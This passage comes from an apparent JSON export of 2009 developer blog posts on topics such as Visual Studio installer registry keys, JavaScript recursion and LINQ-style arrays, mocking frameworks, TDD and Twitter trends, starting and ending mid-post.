annoyed at Apple and their marketing attitude.\nAnd today I read an article which really got me angry, Apple announced that Safari 4 has had 11 million downloads. Now if you read that article you'd think that Safari has become the most dominate browser on the planet. I mean, Safari has always been a bit-player running along behind the likes of IE and Firefox like the annoying yappy little dog trying to be one of the big fellows.\nYou know what, nothing has changed.\nWhat Apple have failed to mention in their announcement is that Safari 4 is pushed out to all OS X 10.5 (and 10.6 beta users I guess) as a system update, and at that, a pre-selected system update.\nSo I've installed Safari 4, but I use it maybe 1% of my browsing time (I'm one of those really horrible people who uses an even more obscure browser, Opera :P), but hey, I'm part of the 11 million strong loyal Safari fan-base. \nSure Microsoft probably has IE8 listed as an update for Vista (work domain policy just auto-updates for me, I don't ever look at them) but I remember when IE7 was released for XP it wasn't selected-by-default as an install, it was an optional. Sure Safari 4 was an optional upgrade, but when something is optional by opt-out rather than optional by opt-in you find more people will not bother to opt-out.\nUsing Apple's logic we can say that 20 million people think Kevin Rudd is a good prime minister. After all, the population of Australia is 20 million, he's the PM and to the best of my knowledge there isn't any kind of coup d'état planned to remove him from power.\nAs the great Homer Simpson said \"People can come up with statistics to prove anything. 14% of people know that\".\nOh, and to close off, this post was written in Safari 4 on OS X ;).\n", "id": "2009-06-13-people-can-come-up-with-statistics-to-prove-anything-14-of-people-know-that" }, { "title": "Creating an installer for a Single File Generator - Part 2", "url": "https://www.aaron-powell.com/posts/2009-06-08-creating-an-installer-for-a-single-file-generator---part-2/", "date": "Mon, 08 Jun 2009 11:41:59 +0000", "tags": [ "Visual Studio", "LINQ to Umbraco" ], "description": "", "content": "This post will be looking at another problem I had to overcome with creating the SFG for LINQ to Umbraco, this time I'll look at how to do an installer while using wild-card version numbering.\nI'm a big fan of wild-card versioning of assembliies, and if you're not familiar with what I'm taking about I'm referring to when you make the assembly version number end in a * within the AssemblyInfo.cs file, eg:\n[assembly: AssemblyVersion(\"0.0.1.*\")] So what's the point of this? Well I find it useful when you're doing development and releases to know exactly where you're at. There's nothing worse than going to update an environment, but then you find out that the same version is already there. Was it because the developer hadn't incremented the version number, or did I miss the deployment?\nBy using wild-card versioning the numbers for the * are generated by the compiler on the fly. I'm not 100% sure how it can it is generated, I got a little bit of information from a developer on the VS core team stating:\nWhen versioning as #.#.x.y x is generated as the number of days since some time in 2000 (which you can work out fairly easily) and y is the number of seconds since midnight on the date divided by 2.\nPretty sweet but it means that knowing the version number before compile time is next to impossible. This makes a real problem when doing the CLSID registry key which I talked about in Part 1 of this series.\nSo how do we get around this? Well the obvious way is to make a fixed version number, but as I stated I don't like doing that, particularly when I'm doing the development, I'm really wanting to know what version of the generator is running vs what version I last compiled.\nWell, how do we get around it?\nIntroducing System.Configuration.Install.Installer (System.Configuration.Install)\nWe need to make a class which inherits from the Installer class. This will allow us to run custom .NET code during the installer which we can do what we want, like say, edit the registry.\nThere are two methods which should be overriden, Install and Uninstall. If we're modifying the registry we need to write our own custom code to undo those changes. No one likes it when software doesn't clean up after itself.\nBecause we're going to need to know the version of the assembly the best place to add this is within the same assembly as the SFG itself.\nRegistry editing 101\nThere's lots of good tutorials on editing the registry with .NET so I'll just cover the basics. First off you need to create the generator key within the CLSID key:\nRegistryKey genKey = Registry.LocalMachine.CreateSubKey(@\"Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\{52B316AA-1997-4c81-9969-95404C09EEB4}\");  Next we need to create the values for the registry key via genKey.SetValue(name, data). So it will look like this:\ngenKey.SetValue(\"Assembly\", Assembly.GetExecutingAssembly().FullName); genKey.SetValue(\"Class\", \"Umbraco.Linq.DTMetal.CodeBuilder.LINQtoUmbracoGenerator\"); genKey.SetValue(\"InprocServer32\", Path.Combine(Environment.GetEnvironmentVariable(\"SystemRoot\"), @\"system32\\mscoree.dll\")); genKey.SetValue(\"ThreadingModel\", \"Both\"); genKey.Close(); Since we need to get the full name of the assembly, including version number (which we don't know!) we can just use reflection against the current assembly. And also we don't have the Installer environment variables so we need to map the path ourselves. And once done close off the registry.\nWrapping It Up\nTo finish it up we need to add an attribute to our custom installer class:\n[RunInstaller(true)] And then edit the Custom Actions section of the Windows Installer project and specify that the output of the SFG assembly will be used in both the Install and Uninstall steps.\nConclusion\nSo this is how you go about doing a SFG with wild-card assembly versioning and setting the registry up correctly.\n", "id": "2009-06-08-creating-an-installer-for-a-single-file-generator---part-2" }, { "title": "Creating an installer for a Single File Generator - Part 1", "url": "https://www.aaron-powell.com/posts/2009-06-08-creating-an-installer-for-a-single-file-generator---part-1/", "date": "Mon, 08 Jun 2009 10:40:41 +0000", "tags": [ "Visual Studio", "LINQ to Umbraco" ], "description": "", "content": "LINQ to Umbraco is trucking along brilliantly and I recently solved a really big problem that I had, creating a Single File Generator (SFG).\nFor anyone who's not familiar with a SFG it is a tool for Visual Studio which allows a document to have .NET code generated for it when the file is saved (or the custom tool is explicitly run). There's a very good example as part of the Visual Studio 2008 SDK which covers how to create a SFG (here is the documentation for it).\nThe most familiar SFG people will know is the one used by LINQ to SQL or Entity Framework.\nThe above linked document (and the SDK example) are great for explaining how to create the SFG, but there is something which it doesn't cover, how do you provide a redistributable for it?\nThis was a major problem that I was having, I couldn't work out the best way to achieve it. Luckily I came across a project which showed me how it was to be done, in the form of LINQ to SharePoint. There are a few registry keys that need to be inserts in the right places, and if it wasn't for LINQ to SharePoint I wouldn't have been able to find anywhere which explained it.\nFirst off you need to have an Installer project, and I'm going to make the assumption that that has been done and that the DLL's you want deployed are linked in already.\nRegistry Keys\nThe keys need to be added with HKEY_LOCAL_MACHINE (HKML) and the first one is in a key called AssemblyFolderEx. The full path we'll be creating the key is HKLM\\Software\\Microsoft\\.NETFramework\\v3.5\\AssemblyFolderEx. In this key you'll need to create a new key, which has the name of the SFG (eg: LINQtoUmbracoGenerator) and it has a default value of [TARGETDIR], which is a variable from within the installer.\nI'm not 100% sure of the point of this registry key, nor if it's actually required. Better safe than sorry in my opinion though :P\nNow we need to create the registry keys within Visual Studio to activate the SFG, there's actually 2 - 3 (depending what languages you support) that need to be created.\nThe CLSID Key\nThe CLSID key is used to define assembly, class and some other data about your SFG. This key will reside in HKLM\\Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\. In this registry key you need to create a new key which uses the GUID of your generator class as it's name. So for LINQ to Umbraco I ended up with a key like this:\nHKLM\\Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\{52B316AA-1997-4c81-9969-95404C09EEB4}\nInside this key we need to create the following (all String values):\nAssembly Full name of the assembly (including version, public key, etc) Class Full name of the class of the SFG InprocServer32 [SystemRoot]\\system32\\mscoree.dll (not quite sure what this is for) ThreadingModel Both (again, don't really know what it's for) Now the CLSID is set up for the generator so Visual Studio will be aware of where the class to invoke resides.\nThe Language Generators\nAlthough the CLSID is set up you need to set the generator names for the language(s) you are supporting. LINQ to Umbraco supports C# and VB.NET so I'll point out both in here.\nAll the installed SFG's are kept under a single key within the registry, which is HKLM\\Software\\Microsoft\\VisualStudio\\9.0\\Generators. If you look at this within your registry there will be a number of different GUID's (changing depending on what Visual Studio languages you have installed).\nFor VB.NET you need to create under the {164B10B9-B200-11D0-8C61-00A0C91E29D5} key, and for C# place under {FAE04EC1-301F-11D3-BF4B-00C04F79EFBC}.\nUnder the language keys you need to create a new key with the name of your generator (eg: LINQtoUmbracoGenerator) with the following values:\n(Default) - String Friendly name of your generator (eg, VB LINQ to Umbraco Generator) CLSID - String GUID (including {}) of the CLSID defined earlier GeneratorDesignTimeSource - DWORD 1 if you want to generate on save (I think!) Replicate that under each of the language you want to support.\nConclusion\nSo that concludes part 1, the registry keys are the most frustrating part, but once they are working it's such a relief. If the above was confusion (which I'm not doubting it was) I'd suggest you grab a copy of the LINQ to Umbraco source from CodePlex and just look at what is setup in there.\n \nUpdate: Just realised I had a registry key wrong. It should have been HKLM\\Software\\Microsoft\\v3.5 not HKLM\\Software\\Microsoft\\3.5\n", "id": "2009-06-08-creating-an-installer-for-a-single-file-generator---part-1" }, { "title": "Recursive Anonymous Functions", "url": "https://www.aaron-powell.com/posts/2009-06-06-recursive-anonymous-functions/", "date": "Sat, 06 Jun 2009 00:00:00 +0000", "tags": [ "javascript", "black-magic" ], "description": "To know recursion you must first know recursion", "content": "I was on StackOverflow the other day and I was reading a post about the strangest programming language you’ve ever used. While looking at what people have used I realized I haven’t worked with anything that strange.\nBut then I was thinking there is one language I used that’s a bit strange, JavaScript.\nWithout going into all the weirdness of the JavaScript language I’d like to focus on one bit craziness which I’m quite fond of, self executing recursive anonymous functions. Yeah it’s a bit of mouthful but it’s also a bit of fun, and may even have some practical uses.\nWe’re all familiar with JavaScripts ability to do anonymous functions, they are often used within event delegates and and constantly used when doing jQuery. Something like this:\njQuery('#button').click(function() { ... } ); So that’s the anonymous part of what we’re trying to achieve, now lets look at self executing functions. JavaScript can do self executing functions, they are generally used for creating objects. jQuery is in fact an example of this, which is why if you do a typeof jQuery you get function as the response. For example:\nvar result = (function() { ... })(); Notice the () at the end, this tells the function to execute and take no parameters. But you can also do this:\nvar result = (function(node) { ... } )(document.getElementById('button')); I’m not going to cover what a recursive function is, I’m sure we all know what they are, but I did raise a problem, we’re using anonymous functions, how do I call a function without a name?\nWell JavaScript actually has a way of doing this, every JavaScript function has a hidden parameter called arguments, this is a collection of all the arguments passed into the function in the order they were passed in. So you can do something like this:\n(function() { for(var i = 0; i < arguments.length; i++) { alert(arguments[i]); } })("hello", "world"); This will do two alerts, the first saying hello the second saying world. But there’s another property on the arguments object, arguments.callee. This is a reference to the method which called the current function. And because it’s a reference to the function we can have some real fun, because you can execute arguments.callee!\nSay I wanted to know if a node as a child of a node with a particular ID, I can do this:\nvar isChild = (function(node) { if(node) { if(node.id === 'parent') { return true; } else { return argument.callee(node.parentNode); } } else { return false; } })(document.getElementById('child')); How nifty! Ok, yeah it does make the function a lot less reusable, but hey, this was an example of craziness of the JavaScript language! Oh, and I have used this before, see my post Creating jQuery plugins for MS AJAX components, dynamically!\nAnd this is why JavaScript is the strangest language I have ever used.\n", "id": "2009-06-06-recursive-anonymous-functions" }, { "title": "Isolating vs Mocking", "url": "https://www.aaron-powell.com/posts/2009-06-01-isolating-vs-mocking/", "date": "Mon, 01 Jun 2009 21:46:45 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "I've been doing a lot of playing with testing frameworks and working out what's the best to use for the different needs. There's two kinds of frameworks out there for .NET, mocking frameworks and isolation frameworks.\nThere are different reasons for using the different framework types and I'm to try and explain which one is a good choice for what you're trying to do.\n \nWhat is mocking?\nMocking is the concept of producing fake versions of the objects you want to operate with. With these fake versions you then are able to specify how they operate, what their methods will return, etc.\nThere's quite a few frameworks available for mocking, RhinoMocks, Moq and NMock to name a few. These are all open source projects and they are all very good. The each offer very similar features, the kind of features which are expected by developers such as:\nMocking properties and methods Expecting calls Asserting execution paths Mocking frameworks are best when you've got full control over the components being used, or the components used are prebuilt with mocking in designed.\n \nWhat is isolating?\nIsolating is similar to mocking, but it is much more broadly focused, with the idea that you make fake versions of everything, regardless of whether you developed the component or not.\nThis is why isolating frameworks are becoming popular with hard-to-mock components such as CMS cores, ASP.NET or Silverlight.\nWhen it comes to isolation frameworks in .NET Typemock is one of the biggest players. Their framework is well designed to do testing SharePoint, ASP.NET (via Ivonna) and others. But it's quite possible to use Typemock to mock out other systems such as the .NET framework (with the limitation of mscorlib, but that's changing!) or other CMS's such as Umbraco.\n \nWhat makes mocking different to isolation?\nSo now that we've got a bit of a background on mocking and isolating what's the different between the two, why would you use Typemock which isn't free over RhinoMocks which is?\nWell it really comes down to what you're trying to do, mocking frameworks are only useful when the project is designed for mocking, where as isolating can be done more after the fact.\nTo understand what I mean by this you really need to understand how the framework types work. Most of the free mocking frameworks are built on top of the DynamicProxy which is used for dynamically generating the classes. This is how the mocking frameworks operate, an implementation of the class is dynamically created. This is why working with mocking frameworks really require the code to be designed for mocking. If your class is sealed, or your method is non-virtual it is no longer able to be mocked. Because of how DynamicProxy works it implements the class with the rules specified, but if it's sealed, it can't have an implementation done. Same with non-virtuals, if an override can't be performed there is no way to add your own rules.\nTypemock's Isolator on the other hand uses black magic to achieve what it does. Ok, well not black magic but close, I'm not really privileged to it's operation, but from my understanding it uses a profiler to analyze the execution path and then creates the rules specified in raw IL and inject that. This means that the restraints of DynamicProxy no longer apply. Since the IL is being injected on-the-fly anything can be faked. Sealed classes, non-virtuals, even objects without public constructors!\n \nWhich to use when?\nSo which should you be using and when? Well mocking is great when you're starting a new project, when you've got ground up control over what's being developed. Making something that is 100% mockable is a very difficult task though, it requires a lot of design though, and ensuring that all data required for an operation is either passed is or available on the base object.\nThis can lead to what I consider lax design, particularly when you're developing a framework of your own. Because everything has to be unsealed and virtual it can lead to undesirable extensibility.\nI'm from the school of thought that classes should be sealed-by-default. If something is to be extended I'll design it for extensibility, and if I don't want it extended or don't think it should be extended I wont make it available for extension.\nAnd here is where isolation frameworks come in, they allow for this kind of design. Because they don't require the classes or methods designed for extensability it means tighter design but testing still achievable.\nAdditionally it does mean that it's possible to fake out systems you have no control over, such as a CMS which are inheritly untestable.\nSome people are concerned about this kind of faking power, that you're possibly making assumptions of how an external system will operate which may be incorrect. But if that is the case then you're placing too much on the unit tests, without having any integration tests to back up the assumptions.\n \nConclusion\nHopefully this has shed some light onto the world of mocking and isolating. But really the best way to work out what's right for you is to grab a copy and get coding! \n", "id": "2009-06-01-isolating-vs-mocking" }, { "title": "Using Umbraco in a WPF application", "url": "https://www.aaron-powell.com/posts/2009-05-30-using-umbraco-in-a-wpf-application/", "date": "Sat, 30 May 2009 10:40:27 +0000", "tags": [ "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "One of the goals of LINQ to Umbraco is to be able to have Umbraco applications which are done without a web context, starting to using Umbraco as a service.\nNow there's been plenty of ways to do this in the past, you can quite easily have a web service which pushes out the data you require, but I wanted to do it entirely without web stuff.\nWith Code Garden coming up in a few weeks I decided to have a look into writing something to show off the concept I was thinking of, that you could write a WPF application which is entirely driven from Umbraco content.\nWhen reading a recent blog post from Scott Hanselman in which he talks about a tool he uses when doing presentations which reads Twitter hash tags and he can get audience feedback. So I thought, why not do that, but using Umbraco for the messages rather than Twitter.\nEnter the Umbraco Notifier\nSo my concept was decided, you would have a small WPF app that sits in the system tray and check an Umbraco XML file for changes.\nTo go along with that I would have an Umbraco instance running which has a simple web form that people can submit their notification to me.\nNow I'm not going to give away the code here, thats a secret for CG, but pictures are worth 1000 words, so how many words is a screen cast worth? Follow the link to see the notifier in action!\nYou'll probably want to turn your computer speakers off, I'm still learning how to use the software and the background noise is well... backgroundy :P.\n \nSo there you have it folks, an Umbraco driven WPF application, with LINQ to Umbraco in full operation. \n", "id": "2009-05-30-using-umbraco-in-a-wpf-application" }, { "title": "Windows 7, Virtual XP and I'm worried", "url": "https://www.aaron-powell.com/posts/2009-05-24-windows-7-virtual-xp-and-im-worried/", "date": "Sun, 24 May 2009 11:03:22 +0000", "tags": [ "Random Junk" ], "description": "", "content": "As most people are aware by now Windows 7 will be having the ability to run a virtualised version of Windows XP within it. Scott Hanselman has a good post up on it (see here), even Karl bounced a post about it.\nPersonally I'm not that interested in it, in fact I think that the idea is very bad, by adding this it's essentially preventing to EOF of Windows XP.\nWindows XP is 8 years old this year, that's a long time in computing years. As Jeff Atwood points out in his post, the specs of an average XP release pc was archaic by todays standards.\nSure it's true that by having the virtual XP it'll improve backwards compatibility, but this is something that I believe is hurting Microsoft as well.\nApple is notorious for not caring as much about backwards compatibility, particularly with their iPod range, simply stopping to support architectures, stuff like that.\nIt allows Apple to have less worries in a new version, the old stuff doesn't \"half work\", it simply doesn't work.\nSure you'll piss people off, their software no longer works so they have to invest in making it work, but doesn't active development like that ensure that software doesn't become stagnate?\n \nBut really, my main issue with the virtual XP can be seen in this image.\nVirtual XP will increase the life of IE6, if an organisation can roll out Win7 but still have their shit IE6-designed internal software still used via virtual XP, why bother upgrading it, we may as well keep it around for a while longer.\nAs a web developer I am waiting for the day when IE6 is no longer among us, but now it looks like that day is a lot further away than I'd like. \n", "id": "2009-05-24-windows-7-virtual-xp-and-i'm-worried" }, { "title": "Query Syntax vs Method Syntax", "url": "https://www.aaron-powell.com/posts/2009-05-19-query-syntax-vs-method-syntax/", "date": "Tue, 19 May 2009 00:00:00 +0000", "tags": [ "linq", "c#", ".net" ], "description": "What's the difference with LINQ to using query syntax to pure lambda expressions?", "content": "While working on an IQueryable<T> provider I was having a problem when doing LINQ statements via the Query Syntax that wasn’t happening when using the Method Syntax (chained lambda expressions).\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, etc).\nI’ll use LINQ to SQL for the examples as it’s more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items; That statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it’s not executed yet, no DB query has occured, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item; This time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here’s the interesting part, they are not the same. That’s right, although you’re getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item); But is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. You’ll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you’re not doing a redundant call to Select. But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2009-05-19-query-syntax-vs-method-syntax" }, { "title": "Book review - Advanced ASP.NET AJAX Server Controls", "url": "https://www.aaron-powell.com/posts/2009-05-17-book-review---advanced-aspnet-ajax-server-controls/", "date": "Sun, 17 May 2009 15:11:09 +0000", "tags": [ "ASP.NET", "AJAX", "JavaScript", "Book Review" ], "description": "", "content": "A couple of months ago I picked up a cope of Advanced ASP.NET AJAX Server Controls and read it cover-to-cover.\nWhen ASP.NET AJAX was first released back in 2007 I bought Professional ASP.NET AJAX and read it cover-to-cover, so this wasn't my first foray into .NET AJAX books. But I must say that i completely pales in comparison to Advanced ASP.NET AJAX Server Controls.\nFirst impressions\nWhen I started reading the book I was expecting it to be completely .NET based, but to my surprise the first few chapters are entirely JavaScript programming based. The book looks at common JavaScript programing concepts, as well as looking at the MS AJAX model and what advantages it has.\nThe later chapters in the book start looking more into mixing JavaScript with .NET server controls (hence the title), but in a way which makes it seem that doing so is a viable option.\nUnderstanding the MS AJAX framework\nI've done quite a bit with MS AJAX since it was first released, and thought myself reasonably adept in understanding what you can do with it, but after reading the early chapters I found out that I hadn't really scratched the surface.\nSome of the things I really liked was how the authors explain the difference between Sys.Component, Sys.UI.Control, and Sys.UI.Behavior, something which I didn't fully understand prior to reading through the book.\nI also really liked how they explained the MS AJAX client life cycle much better than I'd previously encountered. \nHow events are registered, how the internals of Sys.Application works, etc, are reason enough to buy the book.\nMS AJAX and ASP.NET\nWhen I started with ASP.NET AJAX I was like a lot of people and thought that UpdatePanel's were awesome. I've since changed my thinking but I there are places where they can still be of use. The book covers how to best work with them and pure AJAX implementations, or how your own ASP.NET AJAX server controls can avoid problems with them.\nThe book also looks at how to write server controls specifically designed for ASP.NET AJAX integration, and the difference between a server control and a server control behavior.\nAgain a concept that a lot of developers don't seem to pick up on.\nConclusion\nIf you're an ASP.NET developer who is serious about doing AJAX work then I cannot recommend this book more highly. I loaned it to one of our user interface developers at work (who was not sold on the idea of MS AJAX as a client framework) and he is now using the framework (and design pattern) in a WYSIWYG editor which he is building.\nThe long and the short is, buy this book.\n", "id": "2009-05-17-book-review---advanced-aspnet-ajax-server-controls" }, { "title": "LINQ to Umbraco update (number 2)", "url": "https://www.aaron-powell.com/posts/2009-05-17-linq-to-umbraco-update-number-2/", "date": "Sun, 17 May 2009 14:44:04 +0000", "tags": [ "LINQ to Umbraco" ], "description": "", "content": "I thought today was an apt time to post another update on LINQ to Umbrace, as one month from today I'll be in Copenhagen Denmark preparing for the Umbraco retreat and then Code Garden '09.\nSo what's the status? Anyone who follows the check-ins on Umbraco in Codeplex will have noticed that I haven't really done a lot lately.\nI am still working on it but I've not recently had as much time as I would have liked.\nA lot of the code has been coming together nicely, the provider model is working very well and the unit testability of the codebase is meeting its design.\nBasically I am on track to have a good working prototype to demo at Code Garden this year!\nSo all you lucky people who will be attending should expect a nice bit of a show :) \n", "id": "2009-05-17-linq-to-umbraco-update-(number-2)" }, { "title": "Is TDD worth it?", "url": "https://www.aaron-powell.com/posts/2009-05-12-is-tdd-worth-it/", "date": "Tue, 12 May 2009 23:07:54 +0000", "tags": [ "Unit Testing" ], "description": "", "content": "Today Alistair Denyes finally gave the presentation on Integration Testing which he's been saying he'd give for something like 12 months, so I thought it'd be a good idea to get around to doing this post which I've been putting off for quite a while.\nFirst off I'll start by saying that this isn't about the concept of testing, I do think that testing (both Unit and Integration) is a good idea, it's Test Driven Development (TDD) which I have some problems with.\nOne of the goals when I started LINQ to Umbraco was to ensure that I had high test coverage and that I followed TDD.\nWell that turned out to be not such a good idea. \nMaybe I'll start with some background of what TDD is, just to make sure that we're all on the same page.\nTDD is the idea of writing a test, watching it fail and then implementing the code to make the test past.\nYou do this over and over again, writing more and more code each time until you have all the scenarios completed.\nAnd this is where I found the problem, while writing LINQ to Umbraco I had some idea of what I was doing, but not a huge idea. A lot of the code was prototyping before becoming the real code which got committed to CodePlex.\nStarting to see why I don't think TDD works?\nWhen you're going on theories your tests are often wrong, which means you write a test to validate an assumption which then turns out to be the wrong, when then makes the test invalid.\nAlso something else that I found out was that when I would go to write my first test I would then realise that I had a lot of missing classes/ methods/ etc so I would have to write a bunch of boilerplate code before I can even have compilable assertions!\nAnd then while trying to write the code which would validate my assertion I realised that unless I was to design myself into a corner I would have to write even more boilerplate code!\nSo now the half a dozen lines required to valid an assertion has become dozens of lines over multiple classes.\nMaybe I'm doing it wrong?\n \nBut I did find some value to TDD, when trying to write a LINQ provider which uses IQueryable<T> there's not a while lot of documentation, this meant that I was going to need some way to work out how to understand Expression Trees work. Thanks to TDD I did manage to write tests which would then run and I could follow their stack trace to determine what code was actually being executed!\nThis is how I worked produced A LINQ observation, oddly there isn't anything else I've found that explains that.\n", "id": "2009-05-12-is-tdd-worth-it" }, { "title": "LINQ in JavaScript - part 2", "url": "https://www.aaron-powell.com/posts/2009-05-05-linq-in-javascript---part-2/", "date": "Tue, 05 May 2009 08:43:05 +0000", "tags": [ "LINQ", "JavaScript" ], "description": "", "content": "Recently I did a blog post on my implementation of LINQ in JavaScript which was just talking about a little project I was working on to produce a LINQ-style API within JavaScript.\nI had planned to release the source code in that post but due to a problem with my blogs Umbraco install I was unable to.\nWell I've finally got around to fixing the media section and now I can provide the code.\nI've done a few tweaks within LINQ in JavaScript, and I've added a couple of new operators, Skip, SkipWhile and Take, all providing the same functionality that their .NET counterparts provide.\nLets have a look at the way some of the code works, we'll look at the where method:\nArray.prototype.where = function(fn) { if (typeof (fn) !== typeof (Function)) throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"where takes a function to filter on\"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== \"boolean\") throw Error.argumentType(\"fn\", typeof (ret), typeof (Boolean), \"function provided to where much return bool\"); else if (ret) coll.push(this[i]); } return coll; } First off you'll notice that I expect a function to be passed into the method, otherwise how would you apply a where?! As you'll notice I'm doing a lot of type checking as well, the parameter for Where needs to be a function, so I explicitly check it so.\nThen it's really just a simple itterator that is used, and pushing each item into a new collection where the provided function returns a boolean value of true.\nAgain you'll notice type checking, this time of the return value of the function. Because JavaScript isn't compiled, and there is no type checking I have to do it manually (this means that I'm doing a traditional LINQ API, not one where you can return anything you like, ala this post). Not a big problem, but it does add a little overhead.\nSure you can remove it but then it kind-of defeats what I'm trying to achieve, which is a very type-safe API.\n \nUltimately LINQ in JavaScript is nothing more than throught experiment project. It shows that you can quite easily have a client side query language using JavaScript and functional programming.\nBut I don't recommend that anyone acutally use it. If you're using a client-side query API such as this (or any of the other LINQ implementations for JavaScript) you're doing it wrong. Particularly operators like where, skip, take and even select. These operators are designed to lower/ change the data volume you are working with, which on the client side is not a good idea. It means that you've returned too much data from the server!\nI see the only real useful reason for this (other than just wanting to prove it can be done) is to manipulate a DOM structure, say client-side reordering of a table.\nBut that said anyone who's interested in seeing how it works and having a play yourself you can find the code here.\n", "id": "2009-05-05-linq-in-javascript---part-2" }, { "title": "Creating jQuery plugins for MS AJAX components, dynamically!", "url": "https://www.aaron-powell.com/posts/2009-05-05-creating-jquery-plugins-from-ms-ajax-components/", "date": "Tue, 05 May 2009 00:00:00 +0000", "tags": [ "javascript", "ms-ajax", "jquery" ], "description": "Bringing jQuery and MS AJAX together", "content": "Bertrand Le Roy had an interesting post entitled Creating jQuery plug-ins from MicrosoftAjax components. It’s not a bad concept, but I miss read it when I first had a read, I thought it was creating all of certain types into a jQuery plug-ins.\nBut as I said I miss read it, no drama, I decided to create that on my own. So I created a simple function for Microsoft AJAX which will turn all the loaded Sys.UI.Control types into jQuery plug-ins:\nSys.Application.add_load(function() { var types = new Array(); for (i in Sys.__upperCaseTypes) { var t = Sys.__upperCaseTypes[i]; var ret = (function(type) { if (type && type.__class) { if (type.__baseType) { if (type.__baseType.__typeName === "Sys.UI.Control") { return true; } else { return arguments.callee(type.__baseType); } } } })(t); if (ret) types.push(t); } for (var i = 0; i < types.length; i++) { var t = types[i]; var nameParts = t.__typeName.split("."); var name = t.__typeName; if (nameParts.length > 1) { name = nameParts[nameParts.length - 1]; } jQuery.fn[name] = function(properties) { return this.each(function() { Sys.Component.create(t.__typeName, properties, {}, {}, this); }); } } }); It looks at the collection of registered types which are done when you do MyType.registerClass(“MyType”); so it’s nice easily does them all. It’ll automatically create a plug-in for any type inheriting from Sys.UI.Control, but it can easily be done to any base type which want. So you could use Sys.Component (although I don’t recommend it).\nYeah it’s not really that practical, especially if you have a lot of controls, but it’s just a POC. If I get some time I’ll modify it to check interfaces instead :P\n", "id": "2009-05-05-creating-jquery-plugins-from-ms-ajax-components" }, { "title": "Viralising via twitter", "url": "https://www.aaron-powell.com/posts/2009-04-26-viralising-via-twitter/", "date": "Sun, 26 Apr 2009 21:33:16 +0000", "tags": [ "Random Junk" ], "description": "", "content": "Yet another one of my posts about how I just don't get Twitter, this time it's about the way which sites can go viral via Twitter, and how quickly they spread.\nA while ago a site started going around, called WeFollow, which is just a user directory. You can put yourself up on their directory, listing a few hashtags which you are primarily posting under.\nI listed myself on there, and watch as the people I follow also listing themselves on there as well.\nNo big deal, it was kind of cool, maybe I'd pickup a follower or two, or find some people who are useful to follow.\nNot long later some people started tweeting about Fast140, a typing speed test. It starts with one person, but very quickly everyone is on there. And the virus is out and spreading around.\nThe latest site to go viral across the people I follow was Twibes. Twibes is basically the same as WebFollow, but slightly better ogranised.\nLike real life viruses in a small group of people they spread quickly. But what makes this really interesting to observe is that I follow two distinct (and very separate) groups on Twitter, Umbraco developers and SharePoint developers. They don't really overlap in their areas (except for a few exceptions such as myself), and this is where viralising via Twitter is interesting to watch.\nTwibes started in the SharePoint group, first there was the odd few people and then quickly one of the big SharePoint resources does it and bam, everyone starts doing it.\nAnd then interestingly, a few hours later (because of time-zone differences I'd say) it starts with Umbraco. And the same format happens, it starts slowly, then gets picked up by the bigger guys and then the wildfire is out of control.\nI got sucked in with WeFollow and Fast140 but I'm starting to wise up to viralising via Twitter. There's a lot of money which can be made with online advertising if you get enough people to check your stuff out. The way viral marketing can spread around the internet these days, thanks to the explosion of social networking sites, it's becoming easier to get the word out. \nBut people need to be wary. All it takes is one nasty person to realise the power of virualsing via twitter to exploit it.\nSo if you're interested in watching how quickly a virus can spread, join Twitter and await the next big crazy to hit. \n", "id": "2009-04-26-viralising-via-twitter" }, { "title": "Blog update, now with more syntax highlighting", "url": "https://www.aaron-powell.com/posts/2009-04-23-blog-update-now-with-more-syntax-highlighting/", "date": "Thu, 23 Apr 2009 09:06:37 +0000", "tags": [], "description": "", "content": "I finally go around putting a proper syntax highlights on my blog, to fix up that I was previously hand-doing the UI for any code that I was putting into my blog.\nI've gone with the JavaScript tool Syntax Highlighter. It's really neat and very simple to add into a site and use.\nI've chosen the dark theme, to keep it closer to my actual Visual Studio theme (see this post as to why I use a black VS theme).\n<script type=\"text/javascript\"> alert(\"Hey, JavaScript highlighting!\"); </script> public void Alert() { Console.WriteLine(\"And C# as well!\"); } The next thought is that I really should look into Windows LiveWriter to make posting even easier.\n", "id": "2009-04-23-blog-update-now-with-more-syntax-highlighting" }, { "title": "LINQ in JavaScript", "url": "https://www.aaron-powell.com/posts/2009-04-20-linq-in-javascript/", "date": "Mon, 20 Apr 2009 12:40:03 +0000", "tags": [ "LINQ", "AJAX", "JavaScript" ], "description": "", "content": "Let me start by saying that I am aware that there is a LINQ to JavaScript project on Codeplex but this was done by me are more of an achidemic exercise/ challange.\nSo while I've been working on LINQ to Umbraco I've also been spending some time doing AJAX-y stuff, and I have been having a lot of fun playing with JavaScript.\nAnd then one day I was thinking about how I would go about manipulating a collection entirely client-side, and realised that loops are ultimately the only way to go about it. Well that's all well and good, but if you want to do a lot of collection manipulation there's not a really good way to go about it (or at least, a really good way from a .NET developer point of view :P).\nAnd after all, what is LINQ? LINQ really just is a way in which you can do pesudo-dynamic programming in a static language (as Lambda is heavily derived from dynamic languages). So shouldn't it be possible to do in a dynamic language?\nSo I whipped out my copy of Visual Studio and got coding away, and here's an end-line of code entirely in JavaScript:\narray.where(function(item) { return item.property === \"something\"; 